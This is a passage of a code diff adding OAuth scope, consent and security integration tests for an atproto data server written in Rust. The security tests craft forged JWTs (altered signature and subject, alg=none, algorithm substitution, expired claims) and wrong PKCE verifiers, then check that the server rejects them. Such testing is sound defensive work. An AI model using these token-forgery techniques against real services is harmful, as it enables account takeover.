assert!(upload_body["blob"]["ref"]["$link"].is_string()); 289 + } 290 + 291 + #[tokio::test] 292 + async fn test_atproto_scope_allows_batch_writes() { 293 + let url = base_url().await; 294 + let http_client = client(); 295 + let (session, _mock) = create_user_and_oauth_session_with_scope( 296 + "scope-batch", 297 + "https://example.com/callback", 298 + "atproto", 299 + ) 300 + .await; 301 + 302 + let collection = "app.bsky.feed.post"; 303 + let now = Utc::now().to_rfc3339(); 304 + let apply_res = http_client 305 + .post(format!("{}/xrpc/com.atproto.repo.applyWrites", url)) 306 + .bearer_auth(&session.access_token) 307 + .json(&json!({ 308 + "repo": session.did, 309 + "writes": [ 310 + { 311 + "$type": "com.atproto.repo.applyWrites#create", 312 + "collection": collection, 313 + "rkey": "batch-scope-1", 314 + "value": { 315 + "$type": collection, 316 + "text": "Batch post 1", 317 + "createdAt": now 318 + } 319 + }, 320 + { 321 + "$type": "com.atproto.repo.applyWrites#create", 322 + "collection": collection, 323 + "rkey": "batch-scope-2", 324 + "value": { 325 + "$type": collection, 326 + "text": "Batch post 2", 327 + "createdAt": now 328 + } 329 + } 330 + ] 331 + })) 332 + .send() 333 + .await 334 + .unwrap(); 335 + 336 + assert_eq!( 337 + apply_res.status(), 338 + StatusCode::OK, 339 + "atproto scope should allow batch writes" 340 + ); 341 + } 342 + 343 + #[tokio::test] 344 + async fn test_transition_generic_scope_allows_access() { 345 + let url = base_url().await; 346 + let http_client = client(); 347 + let (session, _mock) = create_user_and_oauth_session_with_scope( 348 + "scope-transition", 349 + "https://example.com/callback", 350 + "atproto transition:generic", 351 + ) 352 + .await; 353 + 354 + let collection = "app.bsky.feed.post"; 355 + let create_res = http_client 356 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 357 + .bearer_auth(&session.access_token) 358 + .json(&json!({ 359 + "repo": session.did, 360 + "collection": collection, 361 + "record": { 362 + "$type": collection, 363 + "text": "Post with transition scope", 364 + "createdAt": Utc::now().to_rfc3339() 365 + } 366 + })) 367 + .send() 368 + .await 369 + .unwrap(); 370 + 371 + assert_eq!( 372 + create_res.status(), 373 + StatusCode::OK, 374 + "transition:generic scope combined with atproto should work" 375 + ); 376 + } 377 + 378 + #[tokio::test] 379 + async fn test_consent_endpoint_returns_scope_info() { 380 + let url = base_url().await; 381 + let http_client = client(); 382 + 383 + let ts = Utc::now().timestamp_millis(); 384 + let handle = format!("consent-test-{}", ts); 385 + let email = format!("consent-{}@example.com", ts); 386 + let password = "consent-password"; 387 + let redirect_uri = "https://consent-test.example.com/callback"; 388 + 389 + let create_res = http_client 390 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 391 + .json(&json!({ 392 + "handle": handle, 393 + "email": email, 394 + "password": password 395 + })) 396 + .send() 397 + .await 398 + .unwrap(); 399 + assert_eq!(create_res.status(), StatusCode::OK); 400 + let account: Value = create_res.json().await.unwrap(); 401 + let user_did = account["did"].as_str().unwrap(); 402 + let _ = verify_new_account(&http_client, user_did).await; 403 + 404 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 405 + let client_id = mock_client.uri(); 406 + let (_, code_challenge) = generate_pkce(); 407 + 408 + let par_res = http_client 409 + .post(format!("{}/oauth/par", url)) 410 + .form(&[ 411 + ("response_type", "code"), 412 + ("client_id", &client_id), 413 + ("redirect_uri", redirect_uri), 414 + ("code_challenge", &code_challenge), 415 + ("code_challenge_method", "S256"), 416 + ("scope", "atproto transition:generic"), 417 + ]) 418 + .send() 419 + .await 420 + .unwrap(); 421 + let par_body: Value = par_res.json().await.unwrap(); 422 + let request_uri = par_body["request_uri"].as_str().unwrap(); 423 + 424 + let auth_res = http_client 425 + .post(format!("{}/oauth/authorize", url)) 426 + .header("Accept", "application/json") 427 + .json(&json!({ 428 + "request_uri": request_uri, 429 + "username": &handle, 430 + "password": password, 431 + "remember_device": false 432 + })) 433 + .send() 434 + .await 435 + .unwrap(); 436 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 437 + 438 + let consent_res = http_client 439 + .get(format!("{}/oauth/authorize/consent", url)) 440 + .query(&[("request_uri", request_uri)]) 441 + .send() 442 + .await 443 + .unwrap(); 444 + 445 + assert_eq!(consent_res.status(), StatusCode::OK); 446 + let consent_body: Value = consent_res.json().await.unwrap(); 447 + 448 + assert_eq!(consent_body["client_id"], client_id); 449 + assert_eq!(consent_body["did"], user_did); 450 + assert!(consent_body["scopes"].is_array()); 451 + 452 + let scopes = consent_body["scopes"].as_array().unwrap(); 453 + assert!(!scopes.is_empty(), "Should have scopes in response"); 454 + 455 + let atproto_scope = scopes.iter().find(|s| s["scope"] == "atproto"); 456 + assert!(atproto_scope.is_some(), "Should include atproto scope"); 457 + let atproto = atproto_scope.unwrap(); 458 + assert_eq!(atproto["required"], true, "atproto should be required"); 459 + assert!(atproto["description"].is_string()); 460 + assert!(atproto["display_name"].is_string()); 461 + 462 + let transition_scope = scopes.iter().find(|s| s["scope"] == "transition:generic"); 463 + assert!( 464 + transition_scope.is_some(), 465 + "Should include transition:generic scope" 466 + ); 467 + let transition = transition_scope.unwrap(); 468 + assert_eq!( 469 + transition["required"], false, 470 + "transition:generic should be optional" 471 + ); 472 + } 473 + 474 + #[tokio::test] 475 + async fn test_consent_post_generates_code() { 476 + let url = base_url().await; 477 + let http_client = client(); 478 + 479 + let ts = Utc::now().timestamp_millis(); 480 + let handle = format!("consent-post-{}", ts); 481 + let email = format!("consent-post-{}@example.com", ts); 482 + let password = "consent-post-password"; 483 + let redirect_uri = "https://consent-post.example.com/callback"; 484 + 485 + let create_res = http_client 486 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 487 + .json(&json!({ 488 + "handle": handle, 489 + "email": email, 490 + "password": password 491 + })) 492 + .send() 493 + .await 494 + .unwrap(); 495 + assert_eq!(create_res.status(), StatusCode::OK); 496 + let account: Value = create_res.json().await.unwrap(); 497 + let user_did = account["did"].as_str().unwrap(); 498 + let _ = verify_new_account(&http_client, user_did).await; 499 + 500 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 501 + let client_id = mock_client.uri(); 502 + let (code_verifier, code_challenge) = generate_pkce(); 503 + 504 + let par_res = http_client 505 + .post(format!("{}/oauth/par", url)) 506 + .form(&[ 507 + ("response_type", "code"), 508 + ("client_id", &client_id), 509 + ("redirect_uri", redirect_uri), 510 + ("code_challenge", &code_challenge), 511 + ("code_challenge_method", "S256"), 512 + ("scope", "atproto"), 513 + ]) 514 + .send() 515 + .await 516 + .unwrap(); 517 + let par_body: Value = par_res.json().await.unwrap(); 518 + let request_uri = par_body["request_uri"].as_str().unwrap(); 519 + 520 + let auth_res = http_client 521 + .post(format!("{}/oauth/authorize", url)) 522 + .header("Accept", "application/json") 523 + .json(&json!({ 524 + "request_uri": request_uri, 525 + "username": &handle, 526 + "password": password, 527 + "remember_device": false 528 + })) 529 + .send() 530 + .await 531 + .unwrap(); 532 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 533 + 534 + let consent_post_res = http_client 535 + .post(format!("{}/oauth/authorize/consent", url)) 536 + .json(&json!({ 537 + "request_uri": request_uri, 538 + "approved_scopes": ["atproto"], 539 + "remember": false 540 + })) 541 + .send() 542 + .await 543 + .unwrap(); 544 + 545 + assert_eq!(consent_post_res.status(), StatusCode::OK); 546 + let consent_body: Value = consent_post_res.json().await.unwrap(); 547 + assert!( 548 + consent_body["redirect_uri"].is_string(), 549 + "Should return redirect URI" 550 + ); 551 + 552 + let redirect_uri_response = consent_body["redirect_uri"].as_str().unwrap(); 553 + assert!( 554 + redirect_uri_response.contains("code="), 555 + "Redirect URI should contain authorization code" 556 + ); 557 + 558 + let code = redirect_uri_response 559 + .split("code=") 560 + .nth(1) 561 + .unwrap() 562 + .split('&') 563 + .next() 564 + .unwrap(); 565 + 566 + let token_res = http_client 567 + .post(format!("{}/oauth/token", url)) 568 + .form(&[ 569 + ("grant_type", "authorization_code"), 570 + ("code", code), 571 + ("redirect_uri", redirect_uri), 572 + ("code_verifier", &code_verifier), 573 + ("client_id", &client_id), 574 + ]) 575 + .send() 576 + .await 577 + .unwrap(); 578 + 579 + assert_eq!( 580 + token_res.status(), 581 + StatusCode::OK, 582 + "Token exchange should succeed" 583 + ); 584 + let token_body: Value = token_res.json().await.unwrap(); 585 + assert!(token_body["access_token"].is_string()); 586 + } 587 + 588 + #[tokio::test] 589 + async fn test_consent_post_requires_atproto_scope() { 590 + let url = base_url().await; 591 + let http_client = client(); 592 + 593 + let ts = Utc::now().timestamp_millis(); 594 + let handle = format!("consent-req-{}", ts); 595 + let email = format!("consent-req-{}@example.com", ts); 596 + let password = "consent-req-password"; 597 + let redirect_uri = "https://consent-req.example.com/callback"; 598 + 599 + let create_res = http_client 600 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 601 + .json(&json!({ 602 + "handle": handle, 603 + "email": email, 604 + "password": password 605 + })) 606 + .send() 607 + .await 608 + .unwrap(); 609 + assert_eq!(create_res.status(), StatusCode::OK); 610 + let account: Value = create_res.json().await.unwrap(); 611 + let user_did = account["did"].as_str().unwrap(); 612 + let _ = verify_new_account(&http_client, user_did).await; 613 + 614 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 615 + let client_id = mock_client.uri(); 616 + let (_, code_challenge) = generate_pkce(); 617 + 618 + let par_res = http_client 619 + .post(format!("{}/oauth/par", url)) 620 + .form(&[ 621 + ("response_type", "code"), 622 + ("client_id", &client_id), 623 + ("redirect_uri", redirect_uri), 624 + ("code_challenge", &code_challenge), 625 + ("code_challenge_method", "S256"), 626 + ("scope", "atproto transition:generic"), 627 + ]) 628 + .send() 629 + .await 630 + .unwrap(); 631 + let par_body: Value = par_res.json().await.unwrap(); 632 + let request_uri = par_body["request_uri"].as_str().unwrap(); 633 + 634 + let auth_res = http_client 635 + .post(format!("{}/oauth/authorize", url)) 636 + .header("Accept", "application/json") 637 + .json(&json!({ 638 + "request_uri": request_uri, 639 + "username": &handle, 640 + "password": password, 641 + "remember_device": false 642 + })) 643 + .send() 644 + .await 645 + .unwrap(); 646 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 647 + 648 + let consent_post_res = http_client 649 + .post(format!("{}/oauth/authorize/consent", url)) 650 + .json(&json!({ 651 + "request_uri": request_uri, 652 + "approved_scopes": ["transition:generic"], 653 + "remember": false 654 + })) 655 + .send() 656 + .await 657 + .unwrap(); 658 + 659 + assert_eq!( 660 + consent_post_res.status(), 661 + StatusCode::BAD_REQUEST, 662 + "Should reject consent without atproto scope" 663 + ); 664 + let error_body: Value = consent_post_res.json().await.unwrap(); 665 + assert!( 666 + error_body["error_description"] 667 + .as_str() 668 + .unwrap() 669 + .contains("atproto") 670 + ); 671 + } 672 + 673 + #[tokio::test] 674 + async fn test_token_contains_requested_scope() { 675 + let scope = "atproto transition:generic"; 676 + let (session, _mock) = create_user_and_oauth_session_with_scope( 677 + "scope-token", 678 + "https://example.com/callback", 679 + scope, 680 + ) 681 + .await; 682 + 683 + assert_eq!( 684 + session.scope, scope, 685 + "Session should have the requested scope" 686 + ); 687 + 688 + let parts: Vec<&str> = session.access_token.split('.').collect(); 689 + assert_eq!(parts.len(), 3, "Token should be a valid JWT"); 690 + 691 + let payload_json = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 692 + let payload: Value = serde_json::from_slice(&payload_json).unwrap(); 693 + 694 + assert!( 695 + payload["scope"].is_string(), 696 + "Token payload should contain scope" 697 + ); 698 + let token_scope = payload["scope"].as_str().unwrap(); 699 + assert!( 700 + token_scope.contains("atproto"), 701 + "Token scope should contain atproto" 702 + ); 703 + } 704 + 705 + #[tokio::test] 706 + async fn test_dereference_scope_endpoint() { 707 + let url = base_url().await; 708 + let http_client = client(); 709 + let (session, _mock) = create_user_and_oauth_session_with_scope( 710 + "scope-deref", 711 + "https://example.com/callback", 712 + "atproto", 713 + ) 714 + .await; 715 + 716 + let deref_res = http_client 717 + .post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url)) 718 + .bearer_auth(&session.access_token) 719 + .json(&json!({ 720 + "scope": "atproto transition:generic" 721 + })) 722 + .send() 723 + .await 724 + .unwrap(); 725 + 726 + assert_eq!(deref_res.status(), StatusCode::OK); 727 + let deref_body: Value = deref_res.json().await.unwrap(); 728 + assert!(deref_body["scope"].is_string()); 729 + let resolved_scope = deref_body["scope"].as_str().unwrap(); 730 + assert!(resolved_scope.contains("atproto")); 731 + assert!(resolved_scope.contains("transition:generic")); 732 + } 733 + 734 + #[tokio::test] 735 + async fn test_dereference_scope_requires_auth() { 736 + let url = base_url().await; 737 + let http_client = client(); 738 + 739 + let deref_res = http_client 740 + .post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url)) 741 + .json(&json!({ 742 + "scope": "atproto" 743 + })) 744 + .send() 745 + .await 746 + .unwrap(); 747 + 748 + assert_eq!( 749 + deref_res.status(), 750 + StatusCode::UNAUTHORIZED, 751 + "Should require authentication" 752 + ); 753 + }
+769 -181
tests/oauth_security.rs
··· 2 2 mod common; 3 3 mod helpers; 4 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 - use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint}; 6 5 use chrono::Utc; 7 6 use common::{base_url, client}; 8 7 use helpers::verify_new_account; 9 - use reqwest::{StatusCode, redirect}; 8 + use reqwest::StatusCode; 10 9 use serde_json::{Value, json}; 11 10 use sha2::{Digest, Sha256}; 11 + use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint}; 12 12 use wiremock::matchers::{method, path}; 13 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 - 15 - fn no_redirect_client() -> reqwest::Client { 16 - reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 17 - } 18 14 19 15 fn generate_pkce() -> (String, String) { 20 16 let verifier_bytes: [u8; 32] = rand::random(); ··· 36 32 "token_endpoint_auth_method": "none", 37 33 "dpop_bound_access_tokens": false 38 34 }); 39 - Mock::given(method("GET")).and(path("/")) 35 + Mock::given(method("GET")) 36 + .and(path("/")) 40 37 .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 41 - .mount(&mock_server).await; 38 + .mount(&mock_server) 39 + .await; 42 40 mock_server 43 41 } 44 42 ··· 55 53 let mock_client = setup_mock_client_metadata(redirect_uri).await; 56 54 let client_id = mock_client.uri(); 57 55 let (code_verifier, code_challenge) = generate_pkce(); 58 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 59 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 60 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 61 - .send().await.unwrap().json().await.unwrap(); 56 + let par_body: Value = http_client 57 + .post(format!("{}/oauth/par", url)) 58 + .form(&[ 59 + ("response_type", "code"), 60 + ("client_id", &client_id), 61 + ("redirect_uri", redirect_uri), 62 + ("code_challenge", &code_challenge), 63 + ("code_challenge_method", "S256"), 64 + ]) 65 + .send() 66 + .await 67 + .unwrap() 68 + .json() 69 + .await 70 + .unwrap(); 62 71 let request_uri = par_body["request_uri"].as_str().unwrap(); 63 - let auth_client = no_redirect_client(); 64 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 65 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "security-test-password"), ("remember_device", "false")]) 72 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 73 + .header("Content-Type", "application/json") 74 + .header("Accept", "application/json") 75 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "security-test-password", "remember_device": false})) 66 76 .send().await.unwrap(); 67 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 68 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 69 - let token_body: Value = http_client.post(format!("{}/oauth/token", url)) 70 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 71 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 72 - .send().await.unwrap().json().await.unwrap(); 73 - (token_body["access_token"].as_str().unwrap().to_string(), 74 - token_body["refresh_token"].as_str().unwrap().to_string(), client_id) 77 + let auth_body: Value = auth_res.json().await.unwrap(); 78 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 79 + if location.contains("/oauth/consent") { 80 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 81 + .header("Content-Type", "application/json") 82 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 83 + .send().await.unwrap(); 84 + let consent_body: Value = consent_res.json().await.unwrap(); 85 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 86 + } 87 + let code = location 88 + .split("code=") 89 + .nth(1) 90 + .unwrap() 91 + .split('&') 92 + .next() 93 + .unwrap(); 94 + let token_body: Value = http_client 95 + .post(format!("{}/oauth/token", url)) 96 + .form(&[ 97 + ("grant_type", "authorization_code"), 98 + ("code", code), 99 + ("redirect_uri", redirect_uri), 100 + ("code_verifier", &code_verifier), 101 + ("client_id", &client_id), 102 + ]) 103 + .send() 104 + .await 105 + .unwrap() 106 + .json() 107 + .await 108 + .unwrap(); 109 + ( 110 + token_body["access_token"].as_str().unwrap().to_string(), 111 + token_body["refresh_token"].as_str().unwrap().to_string(), 112 + client_id, 113 + ) 75 114 } 76 115 77 116 #[tokio::test] ··· 83 122 assert_eq!(parts.len(), 3); 84 123 let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]); 85 124 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig); 86 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 87 - .bearer_auth(&forged_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 125 + assert_eq!( 126 + http_client 127 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 128 + .bearer_auth(&forged_token) 129 + .send() 130 + .await 131 + .unwrap() 132 + .status(), 133 + StatusCode::UNAUTHORIZED, 134 + "Forged signature should be rejected" 135 + ); 88 136 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 89 137 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 90 138 payload["sub"] = json!("did:plc:attacker"); 91 139 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 92 140 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 93 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 94 - .bearer_auth(&modified_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 141 + assert_eq!( 142 + http_client 143 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 144 + .bearer_auth(&modified_token) 145 + .send() 146 + .await 147 + .unwrap() 148 + .status(), 149 + StatusCode::UNAUTHORIZED, 150 + "Modified payload should be rejected" 151 + ); 95 152 let none_header = json!({ "alg": "none", "typ": "at+jwt" }); 96 153 let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds", 97 154 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" }); 98 - let none_token = format!("{}.{}.", URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()), 99 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap())); 100 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 101 - .bearer_auth(&none_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "alg=none should be rejected"); 155 + let none_token = format!( 156 + "{}.{}.", 157 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()), 158 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()) 159 + ); 160 + assert_eq!( 161 + http_client 162 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 163 + .bearer_auth(&none_token) 164 + .send() 165 + .await 166 + .unwrap() 167 + .status(), 168 + StatusCode::UNAUTHORIZED, 169 + "alg=none should be rejected" 170 + ); 102 171 let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" }); 103 - let rs256_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()), 104 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 64])); 105 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 106 - .bearer_auth(&rs256_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Algorithm substitution should be rejected"); 172 + let rs256_token = format!( 173 + "{}.{}.{}", 174 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()), 175 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), 176 + URL_SAFE_NO_PAD.encode(&[1u8; 64]) 177 + ); 178 + assert_eq!( 179 + http_client 180 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 181 + .bearer_auth(&rs256_token) 182 + .send() 183 + .await 184 + .unwrap() 185 + .status(), 186 + StatusCode::UNAUTHORIZED, 187 + "Algorithm substitution should be rejected" 188 + ); 107 189 let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds", 108 190 "iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" }); 109 - let expired_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()), 110 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 111 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 112 - .bearer_auth(&expired_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 191 + let expired_token = format!( 192 + "{}.{}.{}", 193 + URL_SAFE_NO_PAD 194 + .encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()), 195 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), 196 + URL_SAFE_NO_PAD.encode(&[1u8; 32]) 197 + ); 198 + assert_eq!( 199 + http_client 200 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 201 + .bearer_auth(&expired_token) 202 + .send() 203 + .await 204 + .unwrap() 205 + .status(), 206 + StatusCode::UNAUTHORIZED, 207 + "Expired token should be rejected" 208 + ); 113 209 } 114 210 115 211 #[tokio::test] ··· 119 215 let redirect_uri = "https://example.com/pkce-callback"; 120 216 let mock_client = setup_mock_client_metadata(redirect_uri).await; 121 217 let client_id = mock_client.uri(); 122 - let res = http_client.post(format!("{}/oauth/par", url)) 123 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 124 - ("code_challenge", "plain-text-challenge"), ("code_challenge_method", "plain")]) 125 - .send().await.unwrap(); 126 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected"); 218 + let res = http_client 219 + .post(format!("{}/oauth/par", url)) 220 + .form(&[ 221 + ("response_type", "code"), 222 + ("client_id", &client_id), 223 + ("redirect_uri", redirect_uri), 224 + ("code_challenge", "plain-text-challenge"), 225 + ("code_challenge_method", "plain"), 226 + ]) 227 + .send() 228 + .await 229 + .unwrap(); 230 + assert_eq!( 231 + res.status(), 232 + StatusCode::BAD_REQUEST, 233 + "PKCE plain method should be rejected" 234 + ); 127 235 let body: Value = res.json().await.unwrap(); 128 - assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("s256")); 129 - let res = http_client.post(format!("{}/oauth/par", url)) 130 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri)]) 131 - .send().await.unwrap(); 132 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 236 + assert!( 237 + body["error_description"] 238 + .as_str() 239 + .unwrap() 240 + .to_lowercase() 241 + .contains("s256") 242 + ); 243 + let res = http_client 244 + .post(format!("{}/oauth/par", url)) 245 + .form(&[ 246 + ("response_type", "code"), 247 + ("client_id", &client_id), 248 + ("redirect_uri", redirect_uri), 249 + ]) 250 + .send() 251 + .await 252 + .unwrap(); 253 + assert_eq!( 254 + res.status(), 255 + StatusCode::BAD_REQUEST, 256 + "Missing PKCE challenge should be rejected" 257 + ); 133 258 let ts = Utc::now().timestamp_millis(); 134 259 let handle = format!("pkce-attack-{}", ts); 135 260 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 139 264 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 140 265 let (_, code_challenge) = generate_pkce(); 141 266 let (attacker_verifier, _) = generate_pkce(); 142 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 143 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 144 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 145 - .send().await.unwrap().json().await.unwrap(); 267 + let par_body: Value = http_client 268 + .post(format!("{}/oauth/par", url)) 269 + .form(&[ 270 + ("response_type", "code"), 271 + ("client_id", &client_id), 272 + ("redirect_uri", redirect_uri), 273 + ("code_challenge", &code_challenge), 274 + ("code_challenge_method", "S256"), 275 + ]) 276 + .send() 277 + .await 278 + .unwrap() 279 + .json() 280 + .await 281 + .unwrap(); 146 282 let request_uri = par_body["request_uri"].as_str().unwrap(); 147 - let auth_client = no_redirect_client(); 148 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 149 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "pkce-password"), ("remember_device", "false")]) 150 - .send().await.unwrap(); 151 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 152 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 153 - let token_res = http_client.post(format!("{}/oauth/token", url)) 154 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 155 - ("code_verifier", &attacker_verifier), ("client_id", &client_id)]) 283 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 284 + .header("Content-Type", "application/json") 285 + .header("Accept", "application/json") 286 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "pkce-password", "remember_device": false})) 156 287 .send().await.unwrap(); 157 - assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected"); 288 + assert_eq!(auth_res.status(), StatusCode::OK); 289 + let auth_body: Value = auth_res.json().await.unwrap(); 290 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 291 + if location.contains("/oauth/consent") { 292 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 293 + .header("Content-Type", "application/json") 294 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 295 + .send().await.unwrap(); 296 + let consent_body: Value = consent_res.json().await.unwrap(); 297 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 298 + } 299 + let code = location 300 + .split("code=") 301 + .nth(1) 302 + .unwrap() 303 + .split('&') 304 + .next() 305 + .unwrap(); 306 + let token_res = http_client 307 + .post(format!("{}/oauth/token", url)) 308 + .form(&[ 309 + ("grant_type", "authorization_code"), 310 + ("code", code), 311 + ("redirect_uri", redirect_uri), 312 + ("code_verifier", &attacker_verifier), 313 + ("client_id", &client_id), 314 + ]) 315 + .send() 316 + .await 317 + .unwrap(); 318 + assert_eq!( 319 + token_res.status(), 320 + StatusCode::BAD_REQUEST, 321 + "Wrong PKCE verifier should be rejected" 322 + ); 158 323 } 159 324 160 325 #[tokio::test] ··· 172 337 let mock_client = setup_mock_client_metadata(redirect_uri).await; 173 338 let client_id = mock_client.uri(); 174 339 let (code_verifier, code_challenge) = generate_pkce(); 175 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 176 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 177 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 178 - .send().await.unwrap().json().await.unwrap(); 340 + let par_body: Value = http_client 341 + .post(format!("{}/oauth/par", url)) 342 + .form(&[ 343 + ("response_type", "code"), 344 + ("client_id", &client_id), 345 + ("redirect_uri", redirect_uri), 346 + ("code_challenge", &code_challenge), 347 + ("code_challenge_method", "S256"), 348 + ]) 349 + .send() 350 + .await 351 + .unwrap() 352 + .json() 353 + .await 354 + .unwrap(); 179 355 let request_uri = par_body["request_uri"].as_str().unwrap(); 180 - let auth_client = no_redirect_client(); 181 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 182 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "replay-password"), ("remember_device", "false")]) 356 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 357 + .header("Content-Type", "application/json") 358 + .header("Accept", "application/json") 359 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "replay-password", "remember_device": false})) 183 360 .send().await.unwrap(); 184 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 185 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap().to_string(); 186 - let first = http_client.post(format!("{}/oauth/token", url)) 187 - .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 188 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 189 - .send().await.unwrap(); 361 + assert_eq!(auth_res.status(), StatusCode::OK); 362 + let auth_body: Value = auth_res.json().await.unwrap(); 363 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 364 + if location.contains("/oauth/consent") { 365 + let 